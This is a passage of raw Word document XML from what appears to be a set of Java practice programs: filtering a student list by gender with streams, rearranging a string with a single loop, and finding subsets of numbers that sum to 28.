          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00E14F87" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Return</w:t>
      </w:r>
      <w:r w:rsidR="001451D6" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> the student object if gender is male? (filter)</w:t>
      </w:r>
      <w:bookmarkEnd w:id="325"/>
    </w:p>
    <w:p w14:paraId="778CC0FD" w14:textId="54861CB3" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="16AF89F4"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p>
    <w:p w14:paraId="674C1D6B"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p>
    <w:p w14:paraId="6E119285"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="332EF3CD"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ude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B4BC023"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1416CF31"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gender</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A17416C"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7935B608"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onstructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C953D08"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uden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gend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4531394"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2222ED09"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gend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gender</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30EC24B3"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E48A3DE"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73C3685E"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Getter methods</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A87CD92"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get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6E61169"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3336CBE7"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8391FD4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2286E9B9"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getGend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CC132A7"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gender</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AC0FF59"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910A22B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2A253B"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31E351EE"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to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8CAD6EC"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Student{nam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gend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gend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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18A4162C"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9F341F7"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34369279"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C9DFB75"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ilterMaleStudent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3C486A1"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56DA122"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ing a list of students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39CB7C9A"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udent</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student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p>
    <w:p w14:paraId="4E780553"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uden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Joh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Male"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D7111C6"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uden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li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Female"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C3C3DB"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uden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Bo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Male"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>),</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="623D63D3"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uden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Ev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Female"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682B897D"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FB2A4DD" w14:textId="3DCD0D48"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Using Java 8 Stream API to filter male students</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="136B8F6D"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udent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> maleStude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uden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p>
    <w:p w14:paraId="2069F39C"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il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student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stude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Gend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qualsIgnoreCas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Male"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB36531"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indFir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Returns the first match or an empty Optional</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C3DC125"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orElse</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Default value if no match is found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7827990E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2227AE84"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inting the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="675EBE51"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maleStude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8B80464"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First male studen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aleStudent</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="068D3770"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ls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294859F"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o male student found."</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46D71EF8"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5CBF3D3" w14:textId="77777777"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F444618" w14:textId="30ED3F33" w:rsidR="00523C7A" w:rsidRPr="00CE4B95"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39EC5B90" w14:textId="77777777" w:rsidR="00242515" w:rsidRPr="00CE4B95" w:rsidRDefault="00242515" w:rsidP="00242515">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4EE744C5" w14:textId="204FEDC9" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="326" w:name="_Toc196307806"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="009322AB" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Rearrange String</w:t>
      </w:r>
      <w:bookmarkEnd w:id="326"/>
    </w:p>
    <w:p w14:paraId="5DDD35FE" w14:textId="77777777" w:rsidR="00F10783" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239" w:rsidP="00F10783">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="00F10783" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program using string, use only single for loop?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A6D3575" w14:textId="77777777" w:rsidR="00F10783" w:rsidRPr="00CE4B95" w:rsidRDefault="00F10783" w:rsidP="007B7648">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Input - String str = "Siddhant Patni";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19461535" w14:textId="1AA8775D" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00F10783" w:rsidP="007B7648">
      <w:pPr>
        <w:ind w:left="360" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Output - SiindtdahPata</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30A84B5A" w14:textId="682224C9" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2FF804D4" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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earrangeString</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8DE0DFC" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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9CB55A3" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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t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Siddhant Patni"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68A126EE" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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095F54B4" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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Remove whitespaces from the string</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29412182" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        st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placeAll</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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42AF40D5" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58570597" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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Builder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> resul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Builder</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D7E665F" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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star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152A0F4D" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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n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0999A6B6" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669D4E42" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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ingle for loop to alternate characters from start and end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BD03862" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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st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E0FCB7D" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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EFE439D" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                resul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ppen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harA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ar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Append from start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B74C9A1" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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ls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A681F65" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">                resul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ppen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harA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en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Append from end</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="178953EA" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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A64F2E8" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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DC758EA" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43AAF069" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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 the result</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FD5B919" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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sul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String</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="152ABC77" w14:textId="77777777" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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F7516A5" w14:textId="17F73044" w:rsidR="00BD2A43" w:rsidRPr="00CE4B95"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603BC902" w14:textId="2007B876" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239" w:rsidP="002F0801">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="327" w:name="_Toc196307807"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00CB0F2F" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Given a set of numbers {3, 35, 56, 2, 95, 10, 65, 150, 165, 23, 65, 18, 57}, find all subsets whose sum equals 28.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="327"/>
    </w:p>
    <w:p w14:paraId="10A8D463" w14:textId="78C56A19" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="19654F07"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p>
    <w:p w14:paraId="5E958D8B"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A63EAB5"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ubsetsWithGivenSum</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62FFA18"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099A4A7B"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Helper method to find subsets with a given sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F280967"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findSubsetsWithSu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s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nde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currentSubs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DFDA184"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f we have reached the end of the array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="462A0A69"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ndex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5DE4698"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f the sum of the current subset equals the target sum, print the subset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B471700"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urrentSubs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pToIn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tValu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14A366B"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urrentSubset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17164B10"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D4A7463"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666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3C5FDB8F"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476DA29"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E9C2F3D"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nclude the current element in the subset and move to the next element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68CCF08E"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currentSubse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um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dex</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="193556AC"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findSubsetsWithS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um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ndex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urrentSubset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E4ACB38"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0662E8CE"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Exclude the current element from the subset and move to the next element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B89E8ED"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currentSubse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remov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urrentSubs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iz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14B98785"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findSubsetsWithS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um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ndex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urrentSubset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C90AE5E"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57E16B4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1139C6F8"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092C7D2"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et of numbers</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A08B82D"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6</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9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6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5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6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6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8</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7</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8E7DF9"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34839B50"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arget sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37EA2E72"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targetS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8</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E0491D9"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005C01C9"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List to store current subset</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64BD283A"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currentSubse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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47BD195B"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3C828995"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all helper function to find subsets with the given sum</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76E4E494"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findSubsetsWithS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um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targetS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urrentSubset</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4621FE99" w14:textId="77777777"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FA95340" w14:textId="2695099A" w:rsidR="00436415" w:rsidRPr="00CE4B9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1C8333EF" w14:textId="77777777" w:rsidR="00436415" w:rsidRPr="00CE4B95" w:rsidRDefault="00436415" w:rsidP="00436415">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="511A227F" w14:textId="455F3C33" w:rsidR="00981239" w:rsidRPr="00CE4B95" w:rsidRDefault="00981239">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="328" w:name="_Toc196307808"/>
